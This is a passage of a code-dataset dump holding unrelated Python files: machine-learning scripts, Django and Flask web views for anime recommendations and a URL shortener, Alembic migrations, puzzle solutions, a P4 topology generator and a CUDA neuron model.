gd\nimport csv\nimport matplotlib.pyplot as plt\n\n\nclass LinearRegression(gd.GradientDescent):\n\n def __init__(self, dimension, data_feat, data_exp, alpha, threshold):\n super().__init__(dimension, data_feat, data_exp, alpha, threshold)\n if self.dimension != len(data_feat[0]):\n raise Exception(\"Invalid data set.\")\n\n ## Overridden cost function from superclass.\n def cost(self,feature):\n cos = 0\n\n for i in range(len(self.data_feat)):\n s = 0\n for j in range(len(self.data_feat[i])):\n s += feature[j]*self.data_feat[i][j]\n diff = s - self.data_exp[i]\n diff = diff*diff\n cos += diff\n\n cos = cos/(2*len(self.data_feat))\n return cos\n\n\n\n def predict(self,feature):\n if len(feature) != len(self.features):\n raise Exception(\"Unappropriate data.\")\n\n s = 0\n for i in range(len(feature)):\n s+= self.features[i]*feature[i]\n\n return s\n\n\n## __Main__\n\ndata_feat = [] #Training data set\ndata_exp = [] #Training expected values\n\ntest_feat = [] #Testing dataset\ntest_exp = [] #Testing Expected values\n\n\n\nwith open('data.csv') as data:\n csv_reader = csv.reader(data, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n pass\n line_count += 1\n else:\n if line_count < 8000:\n data_feat.append([1, int(row[0])/52, int(row[1])/37937, int(row[2])/5471, int(row[3])/35682, int(row[4])/5189, float(row[5])/15.0001])\n data_exp.append(float(row[6])/500001)\n line_count+=1\n else:\n test_feat.append([1, int(row[0])/52, int(row[1])/37937, int(row[2])/5471, int(row[3])/35682, int(row[4])/5189, float(row[5])/15.0001])\n test_exp.append(float(row[6])/500001)\n line_count+=1\n\n\n\ndemo = LinearRegression(7,data_feat,data_exp,1,0.01)\nn = int(input(\"Enter number of Iterations (For fast results enter 100) : \"))\nx = np.arange(0,n,10)\ny = []\nfor i in range(len(x)):\n demo.descent(10)\n y.append(demo.cost(demo.features))\n\nplt.plot(x,y)\nplt.ylabel(\"Cost Function\")\nplt.xlabel(\"Number of Iteration\")\nplt.show() #To display Variation of Cost function with number of iterations\n\npredicted = demo.predict([1,23,1106,252,790,230,1.8523])*500001\n\nprint(\"Predicted value for featureset {} is : {}\".format([1,23,1106,252,790,230,1.8523],predicted))","sub_path":"RL/Ishan Bawne/Week2/LinearRegression_2A.py","file_name":"LinearRegression_2A.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"212125658","text":"from typing import final\nfrom django.shortcuts import render\n\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nfrom .recommend import recommend\n\nimport pandas as pd\n\nimport json\nimport pickle\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# Loading Dataset\ndata = pd.read_csv('animes.csv')\ndata.drop(['Unnamed: 0'], axis=1, inplace=True)\n\n# Loading Model\nmodel_file = open('nn_model.pkl', 'rb')\nmodel = pickle.load(model_file)\n\n# Create your views here.\n@api_view(['GET'])\ndef apiOverview(request):\n api_urls = {\n 'GET API Overview': 'api/v1/overview',\n 'GET Anime Recommendations': 'api/v1/anime/:id/recommendations'\n }\n return Response(api_urls)\n\n@api_view(['GET'])\ndef recommendAnimes(request, id):\n final_df = data[[col for col in data.columns if data[col].dtype != 'O']]\n final_df = pd.get_dummies(final_df)\n try:\n ind = recommend(final_df, model, id)\n recommendations = data.iloc[ind[1:]][['title_en', 'poster_image', 'description']].to_json(orient='index')\n except:\n return Response({\n 'success': False\n })\n return Response({\n 'success': True,\n 'anime': id,\n 'recommendations': json.loads(recommendations)\n })","sub_path":"recommendations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"429481668","text":"\"\"\"create text file for blog post\n\nRevision ID: db281c1a17e2\nRevises: b126fee9f5fb\nCreate Date: 2018-12-03 13:28:12.103625\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import Session\nfrom app.models import Post\nimport string, re, os\n\n\n# revision identifiers, used by Alembic.\nrevision = 'db281c1a17e2'\ndown_revision = 'b126fee9f5fb'\nbranch_labels = None\ndepends_on = None\n\n\ndef createFolder(directory):\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print ('Error: Creating directory. ' + directory)\n\n\ndef upgrade():\n conn = op.get_bind()\n session = Session(bind=conn)\n createFolder(\"blogstore\")\n\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('post', sa.Column('file', sa.String(), nullable=True))\n\n for item in session.query(Post):\n item.file = \"blogstore/\" + re.sub('['+string.punctuation+']', '', item.title).replace(' ', '-') + \".txt\"\n with open(item.file, \"a\") as fi:\n fi.write(item.body)\n\n session.commit()\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('post', 'file')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/db281c1a17e2_create_text_file_for_blog_post.py","file_name":"db281c1a17e2_create_text_file_for_blog_post.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534092175","text":"\"\"\"create user table\n\nRevision ID: 568731159647\nRevises: \nCreate Date: 2021-07-12 02:14:28.555245\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '568731159647'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n 'user',\n sa.Column('id', sa.String(36), primary_key=True),\n sa.Column('name', sa.String(255), nullable=False),\n sa.Column('idp_id', sa.String(255), nullable=False),\n sa.Column('email', sa.String(255), nullable=False),\n sa.Column('icon', sa.String(255)),\n )\n\n\ndef downgrade():\n op.drop_table('user')\n","sub_path":"db/versions/568731159647_create_user_table.py","file_name":"568731159647_create_user_table.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"261160158","text":"# -*- coding:utf-8 -*-\n\nimport json\nimport xlwt\n\n\"\"\"操作excel\"\"\"\n\ndef readFile2Dict(path):\n\tstr = ''\n\twith open(path,'r') as f:\n\t\tstr = f.read()\n\t\t#json.loads会改变dict原先的顺序,需注意\n\treturn json.loads(str)\n\n#保存路径 + dict\ndef write2excel(savePath,d):\n\tf = xlwt.Workbook() #创建工作簿\n\tsheet1 = f.add_sheet(u'sheet1',cell_overwrite_ok=True)\n\n\tfor x in d:\n\t\tsheet1.write(r=int(x) - 1,c=0,label=x)\n\t\tsheet1.write(r=int(x) - 1,c=1,label=d[x])\n\tf.save(savePath)\n\nd = readFile2Dict('/home/pingcai/pyProject/show-me-the-code/_0015/city.txt')\n\n\nwrite2excel('/home/pingcai/pyProject/show-me-the-code/_0015/city.xls',d)","sub_path":"_0015/_0015.py","file_name":"_0015.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"199350478","text":"# __author__ : slade\n# __time__ : 17/12/21\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.linear_model.logistic import LogisticRegression\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.ensemble import GradientBoostingClassifier\n\n# load data\nX_train = pd.read_csv('ensemble_X_train.csv').iloc[:, 1:]\nY_train = pd.read_csv('ensemble_Y_train.csv', header=None).iloc[:, 1:]\nX_test = pd.read_csv('ensemble_X_test.csv').iloc[:, 1:]\nY_test = pd.read_csv('ensemble_Y_test.csv', header=None).iloc[:, 1:]\nY_train = np.array(Y_train).ravel()\nY_test = np.array(Y_test).ravel()\n\n\n# define the correction rate , the res1 is the positive case rate , the res2 is the correction rate\ndef metrics_spec(actual_data, predict_data, cutoff=0.5):\n actual_data = np.array(actual_data)\n predict_data = np.array(predict_data)\n bind_data = np.c_[actual_data, predict_data]\n res1 = 1.0 * (bind_data[bind_data[:, 0] == 1][:, 1] >= cutoff).sum() / bind_data[bind_data[:, 0] == 1].shape[0]\n res2 = 1.0 * (\n (bind_data[bind_data[:, 0] == 1][:, 1] >= cutoff).sum() + (\n bind_data[bind_data[:, 0] == 0][:, 1] < cutoff).sum()) / \\\n bind_data.shape[0]\n return res1, res2\n\n\n# if you have read the article 'Kaggle-TianChi分类问题相关纯算法理论剖析', you may know the suggestion of tuning methods , let's follow\n\n# get the base line first\ngbm0 = GradientBoostingClassifier(random_state=10)\ngbm0.fit(X_train, Y_train)\ny_predprob = gbm0.predict_proba(X_test)[:, 1]\nmetrics_spec(Y_test, y_predprob)\n\n# get the n_estimators and learning_rate ,but here is gbdt , only n_estimators\n# if necessary ,increasing param:cv can increase the confidence degree of the current model's result\nparam_test1 = {'n_estimators': [10, 50, 100, 300, 500]}\ngsearch1 = GridSearchCV(estimator=GradientBoostingClassifier(random_state=10),\n param_grid=param_test1, scoring='roc_auc', iid=False, cv=2)\ngsearch1.fit(X_train, Y_train)\nprint(gsearch1.best_params_)\n# {'n_estimators': 50}\n\n# get subsample next\nparam_test2 = {'subsample': [0.7, 0.8, 0.9, 1]}\ngsearch2 = GridSearchCV(estimator=GradientBoostingClassifier(n_estimators=50, random_state=10),\n param_grid=param_test2, scoring='roc_auc', iid=False, cv=2)\ngsearch2.fit(X_train, Y_train)\nprint(gsearch2.best_params_)\n# first show like {'subsample': 0.7},so we need reset the init subsample\n# param_test2 = {'subsample': [0.5, 0.6, 0.7]}\n# gsearch2 = GridSearchCV(estimator=GradientBoostingClassifier(n_estimators=50, random_state=10),\n# param_grid=param_test2, scoring='roc_auc', iid=False, cv=2)\n# gsearch2.fit(X_train, Y_train)\n# print(gsearch2.best_params_)\n# {'subsample': 0.6}\n\n# i have train the max_leaf_nodes and min_weight_fraction_leaf privately but it doesn't work ,so we skip it.Get min_samples_split and max_depth result directly\nparam_test3 = {'min_samples_split': [400, 900, 1300],\n 'max_depth': [3, 5, 7, 9]\n }\ngsearch3 = GridSearchCV(\n estimator=GradientBoostingClassifier(n_estimators=50, random_state=10, subsample=0.6),\n param_grid=param_test3, scoring='roc_auc', iid=False, cv=2)\ngsearch3.fit(X_train, Y_train)\nprint(gsearch3.best_params_)\n# {'max_depth': 7, 'min_samples_split': 900}\n\n# for short, we skip the process of training the max_features and '鞍点逃逸' and '极限探索',but if u want to train a nice model these ways should be added at your process\n# to be frank ,it takes to much time\ngbm1 = GradientBoostingClassifier(n_estimators=50, random_state=10, subsample=0.6, max_depth=7,\n min_samples_split=900)\ngbm1.fit(X_train, Y_train)\ny_predprob = gbm1.predict_proba(X_test)[:, 1]\nmetrics_spec(Y_test, y_predprob)\n\n# we can the get spare leaf nodes for the input of stacking\ntrain_new_feature = gbm1.apply(X_train)\ntest_new_feature = gbm1.apply(X_test)\ntrain_new_feature = train_new_feature.reshape(-1, 50)\ntest_new_feature = test_new_feature.reshape(-1, 50)\nenc = OneHotEncoder()\nenc.fit(train_new_feature)\ntrain_new_feature2 = np.array(enc.transform(train_new_feature).toarray())\ntest_new_feature2 = np.array(enc.transform(test_new_feature).toarray())\n\n# stacking a model , it can be logisticRegression or fm, nerual network and they will come to be beyond all expectations\n# attention points of the stacking model can be obtained from the article mentioned at the top of the code\nlr = LogisticRegression(C=1, penalty='l1', max_iter=100, solver='liblinear', multi_class='ovr')\nmodel_lr = lr.fit(train_new_feature2, Y_train)\ny_test_lr = model_lr.predict_proba(test_new_feature2)[:, 1]\nres2 = metrics_spec(Y_test, y_test_lr)\n","sub_path":"Ensemble/Stacking_gbdt_logistic_regression.py","file_name":"Stacking_gbdt_logistic_regression.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"383356125","text":"import statistics\nfrom functools import cache\n\nfrom parse import *\nfrom typing import Dict\n\n\ndef main():\n crabs = []\n with open('inputs/07.txt') as input_file:\n temp_crabs = input_file.read().strip().split(',')\n crabs = [int(i) for i in temp_crabs]\n med = statistics.median(crabs)\n print(statistics.mean(crabs))\n fuel = 0\n for c in crabs:\n fuel += abs(med-c)\n return fuel\n\n\ndef main_2():\n crabs = []\n with open('inputs/07.txt') as input_file:\n temp_crabs = input_file.read().strip().split(',')\n crabs = [int(i) for i in temp_crabs]\n c_max = max(crabs)\n c_min = min(crabs)\n min_fuel = None\n min_pos = -1\n for i in range (c_min, c_max+1):\n curr_fuel = 0\n for c_pos in crabs:\n curr_fuel += fuel_cost(c_pos, i)\n if min_fuel is None:\n min_fuel = curr_fuel\n min_pos = i\n elif curr_fuel < min_fuel:\n min_fuel = curr_fuel\n min_pos = i\n return min_pos, min_fuel\n\n\n@cache\ndef fuel_cost(c_pos, final_pos):\n return sum(range(0, abs(c_pos - final_pos) + 1))\n\n\nif __name__ == '__main__':\n result = main_2()\n print(result)","sub_path":"2021/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"75459973","text":"import argparse\nimport networkx\n\ndef init_python(f):\n \n f.write('from p4utils.mininetlib.network_API import NetworkAPI\\n')\n f.write('\\n')\n f.write('# Network general options\\n')\n f.write('net = NetworkAPI()\\n')\n f.write('net.setLogLevel(\"info\")\\n')\n\ndef end_python(f):\n\n f.write('\\n')\n f.write('# Assignment strategy\\n')\n f.write('net.l3()\\n')\n f.write('\\n')\n f.write('# Nodes general options\\n')\n f.write('net.enableCpuPortAll()\\n')\n f.write('net.disablePcapDumpAll()\\n')\n f.write('net.enableLogAll()\\n')\n f.write('net.enableCli()\\n')\n f.write('net.startNetwork()\\n')\n\ndef create_linear_topo(f, num_switches):\n \n f.write('\\n')\n f.write('# Network definition\\n')\n\n # Add switches\n for i in range(1, num_switches+1):\n f.write('net.addP4Switch(\"s{}\")\\n'.format(i))\n \n f.write('net.setP4SourceAll(\"p4src/fast_reroute.p4\")\\n')\n f.write('\\n')\n\n # Add hosts\n for i in range(1, num_switches+1):\n f.write('net.addHost(\"h{}\")\\n'.format(i))\n\n f.write('\\n')\n\n # Connect hosts with switches\n for i in range(1, num_switches+1):\n f.write('net.addLink(\"h{}\", \"s{}\")\\n'.format(i, i))\n\n # Connect switches\n for i in range(1, num_switches):\n f.write('net.addLink(\"s{}\", \"s{}\")\\n'.format(i, i+1))\n\ndef create_circular_topo(f, num_switches):\n\n create_linear_topo(num_switches)\n # Add link between s1 and sN\n f.write('net.addLink(\"s{}\", \"s{}\")\\n'.format(1, num_switches))\n\ndef create_random_topo(f, degree=4, num_switches=10):\n\n f.write('\\n')\n f.write('# Network definition\\n')\n\n g = networkx.random_regular_graph(degree, num_switches)\n trials = 0\n while not networkx.is_connected(g):\n g = networkx.random_regular_graph(degree, num_switches)\n trials +=1\n if trials >= 10:\n print(\"Could not Create a connected graph\")\n return\n\n # Add switches\n for i in range(1, num_switches+1):\n f.write('net.addP4Switch(\"s{}\")\\n'.format(i))\n \n f.write('net.setP4SourceAll(\"p4src/fast_reroute.p4\")\\n')\n f.write('\\n')\n\n # Add hosts\n for i in range(1, num_switches+1):\n f.write('net.addHost(\"h{}\")\\n'.format(i))\n\n f.write('\\n')\n\n # Connect hosts with switches\n for i in range(1, num_switches + 1):\n f.write('net.addLink(\"h{}\",\"s{}\")\\n'.format(i, i))\n\n # Connect switches\n for edge in g.edges:\n f.write('net.addLink(\"s{}\",\"s{}\")\\n'.format(edge[0]+1, edge[1]+1))\n\n\ndef main():\n pass\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_name', type=str, required=False, default=\"network_test.py\")\n parser.add_argument(\"--topo\", type=str, default=\"linear\")\n parser.add_argument('-n', type=str, required=False, default=2)\n parser.add_argument('-d', type=str, required=False, default=4)\n args = parser.parse_args()\n\n with open(args.output_name, 'w') as f:\n init_python(f)\n if args.topo == \"linear\":\n create_linear_topo(f, int(args.n))\n elif args.topo == \"circular\":\n create_circular_topo(f, int(args.n))\n elif args.topo == \"random\":\n create_random_topo(f, int(args.d), int(args.n))\n end_python(f)\n","sub_path":"07-Fast-Reroute/solution/network_generator.py","file_name":"network_generator.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"23884825","text":"# 首先json转成 index\\tsentence的形式\n# 去重 句子��面的filter\n# 去垃圾信息(特定 一般) 单词短语层面的filter\n# 去无关文本\n# 再处理成dataloader的形式\n\nimport os\nimport json\nimport sys\nimport random\nfrom tkinter import *\nimport pandas as pd\nimport numpy as np\nimport re\n\nimport os\nimport time\nimport argparse\n\nfrom filter_copy import *\nimport predict\nimport compose_new\n \n# 理论上只需要修改topic_name话题名\n# 以及模型文件load-model\n\ntopic_name = \"NBA\"\nraw_topic_dir = os.path.join(\"./raw_data\",topic_name)\ntopic_dir = os.path.join(\"./data\",topic_name)\npreprocessed_topic_dir = os.path.join(\"./preprocessed_data\",topic_name) \nresult_topic_dir = os.path.join(\"./result\",topic_name)\nnew_topic_dir = os.path.join(\"./new_data\",topic_name)\n\n#in fact可有可无 查看测试结果效果\ncheck_topic_dir = os.path.join(\"./check_data\",topic_name)\n\nif not os.path.exists(topic_dir):\n os.mkdir(topic_dir)\nif not os.path.exists(preprocessed_topic_dir):\n os.mkdir(preprocessed_topic_dir)\nif not os.path.exists(result_topic_dir):\n os.mkdir(result_topic_dir)\nif not os.path.exists(new_topic_dir):\n os.mkdir(new_topic_dir)\n\nif not os.path.exists(check_topic_dir):\n os.mkdir(check_topic_dir)\n\npre_parser = argparse.ArgumentParser(description=\"preprocess data with bert embedding.\")\npre_parser.add_argument('--input-dir', type=str, default=topic_dir)\npre_parser.add_argument('--output-dir', type=str, default=preprocessed_topic_dir)\npre_args = pre_parser.parse_args()\n\n\nparser = argparse.ArgumentParser(description='predict process')\nparser.add_argument('--input-train', type=str, default=\"preprocessed_data/train.json\")\nparser.add_argument('--input-dev', type=str, default=\"preprocessed_data/dev.json\")\nparser.add_argument('--input-test', type=str, default=\"preprocessed_data/2019-09-03-2.json\")\n\nparser.add_argument('--bert-model', type=str, default=\"bert-base-chinese\",\n help=\"Bert pre-trained model selected in the list: bert-base-uncased, \"\n \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \"\n \"bert-base-multilingual-cased, bert-base-chinese.\"\n )\nparser.add_argument('--epochs', type=int, default=6)\nparser.add_argument('--lr', '--learning-rate', default=5e-5, type=float)\nparser.add_argument('--warmup-proportion', type=float, default=0.1)\nparser.add_argument('--batch-size', type=int, default=16)\nparser.add_argument('--dropout-prob', type=float, default=0.1)\nparser.add_argument('--weight', type=float, default=1.0)\nparser.add_argument('--max-len', type=int, default=80)\n\nparser.add_argument('--save-dir', type=str, default='saved_model/'+topic_name)\nparser.add_argument('--test-result',type=str, default=result_topic_dir)\nparser.add_argument('--input-dir',type=str, default=preprocessed_topic_dir)\nparser.add_argument('--use-cpu', type=bool, default=False)\nparser.add_argument('--gpu-devices', type=str, default=\"5\")\nparser.add_argument('--seed', type=int, default=42)\n\nparser.add_argument(\"--resume\", type=bool, default=True)\nparser.add_argument(\"--load-model\", type=str, default=\"saved_model/NBA/ckpt-epoch-10\")\n\nargs = parser.parse_args()\n\ndef main():\n\n print(\"Begin remove dulplicated samples and rubbish words...\")\n #filter = Filter(raw_topic_dir,topic_dir)\n #filter.do_filter()\n print(\"Done\\n\")\n print(\"Begin pick up useless samples,\\n Firstly preprocess data with bert embedding....\")\n tokenizer = BertTokenizer.from_pretrained(\"bert-base-chinese\")\n processor = Preprocess(pre_args, tokenizer)\n processor.do_preprocess()\n print(\"Done\\n\")\n print(\"Secondly use trained model to predict...\")\n predict.predict(args)\n print(\"Done\\n\")\n print(\"Thirdly recompose new samples...\")\n compose_new.create_new(topic_dir,result_topic_dir,new_topic_dir,check_topic_dir)\n print(\"Done\\n\")\nif __name__ == \"__main__\":\n main()","sub_path":"preprocess/neu_weibo/preprocess_test/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"185653249","text":"# 977. Squares of a Sorted Array\n\n# Given an array of integers A sorted in non-decreasing order, return an array of the squares of\n# each number, also in sorted non-decreasing order.\n\n# Example 1:\n\n# Input: [-4,-1,0,3,10]\n# Output: [0,1,9,16,100]\n# Example 2:\n\n# Input: [-7,-3,2,3,11]\n# Output: [4,9,9,49,121]\n\n# Complexity:\n# Time: O(N)\n# Space: O(N)\n# Where:\n# N is the length or the input array\n\nclass Solution:\n def sortedSquares(self, A: List[int]) -> List[int]:\n neg, res = [], []\n for n in A:\n square = n * n\n if n < 0:\n neg.append(square)\n else:\n while len(neg) > 0 and square > neg[-1]:\n res.append(neg.pop())\n res.append(square)\n while len(neg) > 0:\n res.append(neg.pop())\n return res\n","sub_path":"leetcode/977. Squares of a Sorted Array.py","file_name":"977. Squares of a Sorted Array.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417481257","text":"\nimport numpy as np\nimport pycuda.gpuarray as garray\nfrom pycuda.tools import dtype_to_ctype\nimport pycuda.driver as cuda\nfrom pycuda.compiler import SourceModule\n\nfrom neurokernel.LPU.NDComponents.MembraneModels.BaseMembraneModel import BaseMembraneModel\n\nclass BufferVoltage(BaseMembraneModel):\n updates = ['V']\n accesses = ['V']\n def __init__(self, params_dict, access_buffers, dt, LPU_id=None,\n debug=False, cuda_verbose=False):\n if cuda_verbose:\n self.compile_options = ['--ptxas-options=-v']\n else:\n self.compile_options = []\n\n self.dt = np.double(dt)\n self.debug = debug\n self.dtype = np.double\n\n self.LPU_id = LPU_id\n\n self.params_dict = params_dict\n\n self.num_neurons = params_dict['pre']['V'].size\n self.access_buffers = access_buffers\n self.update = get_re_sort_func(self.dtype, self.compile_options)\n\n self.block_re_sort = (256, 1, 1)\n self.grid_re_sort = (cuda.Context.get_device().MULTIPROCESSOR_COUNT*5, 1)\n\n @property\n def maximum_dt_allowed(self):\n return 1.\n\n def run_step(self, update_pointers, st=None):\n self.update.prepared_async_call(\n self.grid_re_sort, self.block_re_sort, st,\n self.access_buffers['V'].gpudata,\n update_pointers['V'],\n self.params_dict['pre']['V'].gpudata,\n self.params_dict['npre']['V'].gpudata,\n self.params_dict['cumpre']['V'].gpudata,\n self.num_neurons)\n\ndef get_re_sort_func(dtype, compile_options):\n template = \"\"\"\n\n__global__ void\nresort(%(type)s* in_v, %(type)s* out_v, int* pre, int* npre,\n int* cumpre, int num_neurons)\n{\n int tid = threadIdx.x + blockIdx.x * blockDim.x;\n int total_threads = blockDim.x * gridDim.x;\n\n for(int i = tid; i < num_neurons; i += total_threads)\n {\n if(npre[i])\n out_v[i] = in_v[pre[cumpre[i]]];\n }\n}\n\"\"\"\n mod = SourceModule(template % {\"type\": dtype_to_ctype(dtype)},\n options = compile_options)\n func = mod.get_function('resort')\n func.prepare('PPPPPi')\n return func\n","sub_path":"retina/NDComponents/MembraneModels/BufferVoltage.py","file_name":"BufferVoltage.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234014717","text":"#\r\n#MIT License\r\n#\r\n#Copyright (c) 2022 John Damilola, Leo Hsiang, Swarangi Gaurkar, Kritika Javali, Aaron Dias Barreto\r\n#\r\n#Permission is hereby granted, free of charge, to any person obtaining a copy\r\n#of this software and associated documentation files (the \"Software\"), to deal\r\n#in the Software without restriction, including without limitation the rights\r\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n#copies of the Software, and to permit persons to whom the Software is\r\n#furnished to do so, subject to the following conditions:\r\n#\r\n#The above copyright notice and this permission notice shall be included in all\r\n#copies or substantial portions of the Software.\r\n#\r\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n#SOFTWARE.\r\n\r\n\r\n\r\nfrom operator import and_\r\nfrom flask import Blueprint, jsonify #import dependancies\r\nfrom flask_cors import cross_origin\r\nfrom string import ascii_letters, digits\r\nfrom flask import request\r\nfrom random import choice\r\ntry:\r\n from ..models.links import Link, db, load_link\r\n from ..models.links_anonymous import AnonymousLink\r\n from ..models.user import User, login_required2\r\n from ..models.engagements import Engagements\r\nexcept ImportError:\r\n from models.links import Link, db, load_link\r\n from models.links_anonymous import AnonymousLink\r\n from models.user import User, login_required2\r\n from models.engagements import Engagements\r\n\r\nlinks_bp = Blueprint(\r\n 'links_bp', __name__\r\n)\r\n\r\n@links_bp.route('/links/', methods = ['GET'])\r\n@cross_origin(supports_credentials=True)\r\ndef getlink(id):\r\n '''This method is called when we want to fetch a single link, we pass link_id'''\r\n try:\r\n link = Link.query.get(id)\r\n return jsonify(\r\n link = link.to_json(),\r\n message = 'Fetched link successfully',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n message = f\"An error occurred: {e}\",\r\n status = 400\r\n ), 400\r\n \r\n@links_bp.route('/links/stub/', methods = ['GET'])\r\n@cross_origin(supports_credentials=True)\r\ndef get_link_by_stub(stub):\r\n '''This method is called when we want to fetch a single link using the stub'''\r\n try:\r\n link = db.session.query(Link).filter(Link.stub==stub).first()\r\n return jsonify(\r\n link = link.to_json(),\r\n message = 'Fetched link successfully',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n message = f\"An error occurred: {e}\",\r\n status = 400\r\n ), 400\r\n \r\n@links_bp.route('/links_anonymous/stub/', methods = ['GET'])\r\n@cross_origin(supports_credentials=True)\r\ndef get_anonymous_link_by_stub(stub):\r\n '''This method is called when we want to fetch a single link anonymously using the stub'''\r\n try:\r\n link = db.session.query(AnonymousLink).filter(AnonymousLink.stub==stub).first()\r\n return jsonify(\r\n link = link.to_json(),\r\n message = 'Fetched link successfully',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n message = f\"An error occurred: {e}\",\r\n status = 400\r\n ), 400\r\n\r\n@links_bp.route('/links/all', methods = ['GET'])\r\n@login_required2()\r\n@cross_origin(supports_credentials=True)\r\ndef getalllinks():\r\n '''This method is called when we want to fetch all of the links of a particular user. Here, we check if the user is authenticated, \r\n if yes show all the links made by the user.'''\r\n args = request.args\r\n user_id = args and args['user_id']\r\n try:\r\n links = db.session.query(Link).join(User).filter(User.id==user_id).all() \r\n _links = []\r\n for item in links:\r\n _links.append(item.to_json())\r\n return jsonify(\r\n links = _links,\r\n message = 'Fetching links successfully',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n message = f\"An error occurred {e}\",\r\n status = 400\r\n ), 400\r\n\r\ndef create_shortlink():\r\n CHARS = ascii_letters + digits\r\n stub = \"\".join(choice(CHARS) for _ in range(12))\r\n \r\n return stub\r\n\r\n\r\n@links_bp.route('/links/create', methods = ['POST'])\r\n@login_required2()\r\n@cross_origin(supports_credentials=True)\r\ndef create():\r\n '''This method is routed when the user requests to create a new link.'''\r\n args = request.args\r\n user_id = args and args['user_id']\r\n try:\r\n data = request.get_json()\r\n long_url=data['long_url']\r\n if data.get('stub'):\r\n stub=data.get('stub')\r\n else:\r\n stub=create_shortlink()\r\n title=data.get('title')\r\n disabled=data.get('disabled')\r\n utm_source=data.get('utm_source')\r\n utm_medium=data.get('utm_medium')\r\n utm_campaign=data.get('utm_campaign')\r\n utm_term=data.get('utm_term')\r\n utm_content=data.get('utm_content')\r\n password_hash=data.get('password_hash') \r\n expire_on=data.get('expire_on')\r\n\r\n link = Link(user_id=user_id, stub=stub, long_url=long_url, title=title, disabled=disabled, utm_source=utm_source, utm_medium=utm_medium,utm_campaign=utm_campaign, utm_term=utm_term, utm_content=utm_content, password_hash=password_hash, expire_on=expire_on)\r\n link.user_id = user_id\r\n db.session.add(link)\r\n db.session.commit()\r\n\r\n return jsonify(\r\n link = link.to_json(),\r\n message = 'Create Link Successful',\r\n status = 201\r\n ), 201\r\n except Exception as e:\r\n return jsonify(\r\n message = f'Create Link Failed {e}',\r\n status = 400\r\n ), 400\r\n \r\n@links_bp.route('/links/create_anonymous', methods = ['POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef create_anonymous():\r\n '''This method is routed when the user requests to create a new link anonymously.'''\r\n try:\r\n data = request.get_json()\r\n long_url=data['long_url']\r\n stub=create_shortlink()\r\n\r\n link = AnonymousLink(stub=stub, long_url=long_url)\r\n db.session.add(link)\r\n db.session.commit()\r\n\r\n return jsonify(\r\n link = link.to_json(),\r\n message = 'Create Link Successful',\r\n status = 201\r\n ), 201\r\n except Exception as e:\r\n return jsonify(\r\n message = f'Create Link Failed {e}',\r\n status = 400\r\n ), 400\r\n\r\n@links_bp.route('/links/update/', methods = ['PATCH'])\r\n@login_required2()\r\n@cross_origin(supports_credentials=True)\r\ndef update(id):\r\n '''This method is called when the user requests to update the link.'''\r\n try:\r\n request_data = request.get_json()\r\n data = {k: v for k, v in request_data.items() if v is not None}\r\n 